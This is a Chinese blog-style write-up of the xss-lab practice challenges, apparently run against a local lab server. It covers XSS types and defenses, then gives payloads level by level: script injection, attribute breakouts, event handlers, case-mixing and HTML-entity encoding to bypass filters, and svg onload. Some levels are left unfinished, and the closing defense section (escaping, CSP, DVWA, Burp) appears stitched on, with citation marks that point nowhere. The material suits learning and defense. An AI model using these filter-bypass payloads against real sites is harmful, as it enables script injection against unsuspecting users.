XSS漏洞攻击报告

XSS漏洞攻击报告

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
    1.反射性XSS;
    2.存储型XSS;
    3.DOMXSS;


XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用对输入进行过滤输出进行转义的方式进行处理:
  输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;

  输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

环境

服务器win7:192.168.188.132

攻击机win10:192.168.188.1

这次我们使用xss-lab

第一关

Payload: http://192.168.188.132/xss/level1.php?name=<script>alert(1)</script>

第二关

这次就不行了

我们判断前有”的标记前面加上”>就可以执行了

Payload: http://192.168.188.132/xss/level1.php?name=”><script>alert(1)</script>

第三关

用第二关的payload去试一下

不行

没有当成js来执行

可以使用事件来执行

Payload=‘onmousemove=’javascript:alert(1)’

第四关

在第三关的基础上变成””就行了

Payload = "onclick ='javascript:alert(1)

第五关

发现过滤了

我们可以构造一个新的标签

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第六关

Pyload="></input><a href='javascript:alert(1)'>asd</a>

第七关

发现了过滤

Payload =1"><ScscriptRipt>alert(1)</ScscriptRipt>

第八关

发现了过滤

使用union编码进行一个转义

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

第九关

Payload=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

显示连接不合法,应该是对url进行判断

第十关

发现了三个input

Payload= &t_sort=" type='text' οnclick='javascript:alert(1)'>//

第11关

这一关要用bp

Payload=

第12关

抓包发现是这个

把user-agent修改

第13关

这次就应该是改cookie

结果

第十四关

有问题

第十五关

是包含外部文件的我们可以使用第一关的代码

第十六关

过滤先是把它小写

Payload =<svg%0Aοnlοad=alert(1)>

### 实现和测试XSS双重防御方法 #### 1. 输入验证与编码 输入验证是指在接收任何来自客户端的数据之前,服务器端应该严格检查并过滤掉非法字符或模式。对于HTML特殊字符应进行转义处理,防止这些字符被解释成活动内容。 ```python import html def sanitize_input(user_input): safe_output = html.escape(user_input) # 对用户输入进行HTML实体编码 return safe_output ``` 此段代码展示了如何对用户提交的内容进行基本的安全转换[^1]。 #### 2. HTTP头部设置 除了上述服务端逻辑上的防范之外,还可以通过配置HTTP响应头来增强安全性。具体来说,可以通过`Content-Security-Policy (CSP)`指令限制页面加载资源的位置以及哪些脚本能被执行。 ```http Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.google.com; ``` 这条CSP规则只允许从当前域名加载资源,并且仅限于本站点本身或是指定第三方API站点提供的JavaScript文件得以执行[^3]。 #### 3. 测试环境搭建 为了有效评估所采取措施的有效性,建议在一个受控环境中模拟真实的Web应用程序场景来进行测试。可以选择开源项目如DVWA(Damn Vulnerable Web Application),它包含了多种已知漏洞供学习者练习修补技巧[^2]。 #### 4. 使用自动化工具辅助检测 借助专门设计用来发现跨站脚本缺陷的静态分析器或者动态扫描程序能够帮助识别可能存在的安全隐患。Burp Suite Pro就是一个非常流行的选择,它可以拦截HTTP流量并对请求参数实施模糊测试以查找潜在问题所在。 #### 5. 结合实际案例深入理解 最后但同样重要的是,参考真实世界发生的事件可以帮助加深对这类威胁的认识水平。查阅公开报道过的安全事件记录,尤其是那些涉及知名网站遭受攻击的事例,往往能提供宝贵的经验教训。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值